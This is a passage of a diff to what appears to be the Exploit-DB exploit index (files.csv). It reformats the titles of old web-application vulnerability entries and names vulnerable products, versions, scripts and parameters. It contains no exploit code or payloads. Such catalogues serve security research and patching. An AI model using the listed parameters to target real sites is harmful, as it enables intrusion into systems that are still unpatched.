Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - search.cgi cid Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - Page Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 +26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - 'search.cgi?cid' Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - 'Page' Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 26845,platforms/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26846,platforms/cgi/webapps/26846.txt,"AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26847,platforms/cgi/webapps/26847.txt,"eDatCat 3.0 - EDCstore.pl Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 @@ -29353,17 +29354,17 @@ id,file,description,date,author,platform,type,port 26850,platforms/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26851,platforms/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - CP-APP.cgi Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26852,platforms/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26853,platforms/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php' p Parameter Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 -26854,platforms/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php' db_id Parameter SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 +26853,platforms/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php?p' Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 +26854,platforms/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php?db_id' SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps,0 26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps,0 26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl?board' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - profile.cgi user Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - 'forum.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - 'profile.cgi?user' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - 'post.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 - 'webcal.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,"Stan Bubrouski",cgi,webapps,0 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,php,webapps,0 @@ -29394,7 +29395,7 @@ id,file,description,date,author,platform,type,port 26897,platforms/php/webapps/26897.txt,"Direct News 4.9 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0 26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,php,webapps,0 26899,platforms/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0 -26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php' page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 +26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php?page' SQL Injection",2005-12-19,r0t,php,webapps,0 26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,php,webapps,0 26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 - 'article.php?cat' SQL Injection",2005-12-19,r0t,php,webapps,0 26903,platforms/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps,0 @@ -29411,7 +29412,7 @@ id,file,description,date,author,platform,type,port 26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps,0 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0 -26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 +26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - 'Title' Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - 'CategoryResults.cfm' Multiple SQL Injections",2005-12-20,r0t3d3Vil,cfm,webapps,0 26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 @@ -29431,7 +29432,7 @@ id,file,description,date,author,platform,type,port 26937,platforms/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps,0 26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings",2005-12-21,r0t3d3Vil,php,webapps,0 26939,platforms/php/webapps/26939.txt,"Scoop 1.1 RC1 - Missing Story Error Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 -26940,platforms/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - articleSearch.asp Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26940,platforms/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleSearch.asp' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26941,platforms/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - 'lostPassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 26942,platforms/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - 'account_login.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 26943,platforms/asp/webapps/26943.txt,"Commercial Interactive Media SCOOP! 2.3 - 'category.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 @@ -29439,16 +29440,16 @@ id,file,description,date,author,platform,type,port 26945,platforms/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 - 'prePurchaserRegistration.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26946,platforms/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 - 'requestDemo.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26947,platforms/asp/webapps/26947.txt,"Sitekit CMS 6.6 - 'Default.aspx' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 -26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 - Request-call-back.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 - registration-form.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 - 'Request-call-back.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 - 'registration-form.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 -26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2/1.4.1 - 'index.php' p Parameter Directory Traversal",2013-07-18,Mahendra,php,webapps,0 +26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2/1.4.1 - 'index.php?p' Directory Traversal",2013-07-18,Mahendra,php,webapps,0 26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,php,webapps,0 -26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php' menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - 'Guestbook.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - 'print.php' Multiple SQL Injections",2005-12-21,r0t3d3Vil,php,webapps,0 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 @@ -29456,9 +29457,9 @@ id,file,description,date,author,platform,type,port 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 -26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 +26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - 'Action' Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 -26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php _load_article_details' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php?_load_article_details' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - 'addresses_export.php?queues' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - 'display_ticket_thread.php?ticket' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 @@ -29475,7 +29476,7 @@ id,file,description,date,author,platform,type,port 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 26988,platforms/php/webapps/26988.txt,"Dream4 Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0 -26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 +26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - 'Globa.php' Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz (Multiple Products) - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 @@ -29491,9 +29492,9 @@ id,file,description,date,author,platform,type,port 27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - 'member.php' Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps,0 -27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action t Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 - Mail Action MID Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action HID Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps,0 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 @@ -29520,7 +29521,7 @@ id,file,description,date,author,platform,type,port 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps,0 27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0 -27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 +27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php?page' Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - 'dv_gbook.php?f' Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 @@ -29533,22 +29534,22 @@ id,file,description,date,author,platform,type,port 27060,platforms/php/webapps/27060.txt,"PHP-Nuke News Submission Story - Text Field Cross-Site Scripting",2006-01-09,night_warrior771,php,webapps,0 27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 27062,platforms/cgi/webapps/27062.txt,"Hummingbird Collaboration - Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps,0 -27063,platforms/asp/webapps/27063.txt,"WebWiz Forums - Search_form.asp Cross-Site Scripting",2006-01-10,nukedx,asp,webapps,0 +27063,platforms/asp/webapps/27063.txt,"WebWiz Forums - 'Search_form.asp' Cross-Site Scripting",2006-01-10,nukedx,asp,webapps,0 27064,platforms/php/webapps/27064.txt,"Orjinweb - 'index.php' Remote File Inclusion",2006-01-10,serxwebun,php,webapps,0 -27067,platforms/php/webapps/27067.txt,"MyPHPim - calendar.php3 cal_id Parameter SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 +27067,platforms/php/webapps/27067.txt,"MyPHPim - 'calendar.php3?cal_id' SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27068,platforms/php/webapps/27068.txt,"MyPHPim - Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27070,platforms/php/webapps/27070.txt,"Interspire TrackPoint NX - 'index.php' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",php,webapps,0 -27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - default.asp Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 +27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 27078,platforms/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - 'Fullview.php' Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 -27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 +27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - 'ForgotPassword.asp' Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - 'addcomment.php' HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27086,platforms/php/webapps/27086.txt,"White Album 2.5 - 'Pictures.php' SQL Injection",2006-01-16,liz0,php,webapps,0 27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 - 'viewcat.php' SQL Injection",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27088,platforms/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps,0 @@ -29562,8 +29563,8 @@ id,file,description,date,author,platform,type,port 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php?Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - 'create.php' Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - 'action.php' Directory Traversal",2006-01-16,liz0,php,webapps,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 @@ -29575,9 +29576,9 @@ id,file,description,date,author,platform,type,port 27117,platforms/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injections",2006-01-20,imei,php,webapps,0 27118,platforms/php/webapps/27118.pl,"RCBlog 1.0.3 - 'index.php' Directory Traversal",2006-01-20,"Aliaksandr Hartsuyeu",php,webapps,0 27119,platforms/php/webapps/27119.txt,"e-moBLOG 1.3 - Multiple SQL Injections",2006-01-23,"Aliaksandr Hartsuyeu",php,webapps,0 -27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - post.php HTML Injection",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 +27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - 'post.php' HTML Injection",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 27121,platforms/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection",2006-01-24,"Jesus Olmos Gonzalez",php,webapps,0 -27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 - Notepad usercp.php HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 +27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad - 'usercp.php' HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 27123,platforms/php/webapps/27123.txt,"PixelPost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f - 'index.php' Cross-Site Scripting",2006-01-24,hackologie,php,webapps,0 27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29593,17 +29594,17 @@ id,file,description,date,author,platform,type,port 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps,0 -27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",asp,webapps,0 +27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - 'forum.asp' Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - 'modules.php' Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 -27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 +27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - 'Userlogin.asp' SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - 'Clients.php' Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - 'Loginout.php' Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,php,webapps,0 -27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - index.php3 Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 +27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - 'index.php3' Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 27162,platforms/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps,0 @@ -29614,14 +29615,14 @@ id,file,description,date,author,platform,type,port 27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 - 'moderation.php' SQL Injection",2006-02-07,imei,php,webapps,0 27169,platforms/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 - Login SQL Injection",2006-02-08,night_warrior771,asp,webapps,0 27170,platforms/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",php,webapps,0 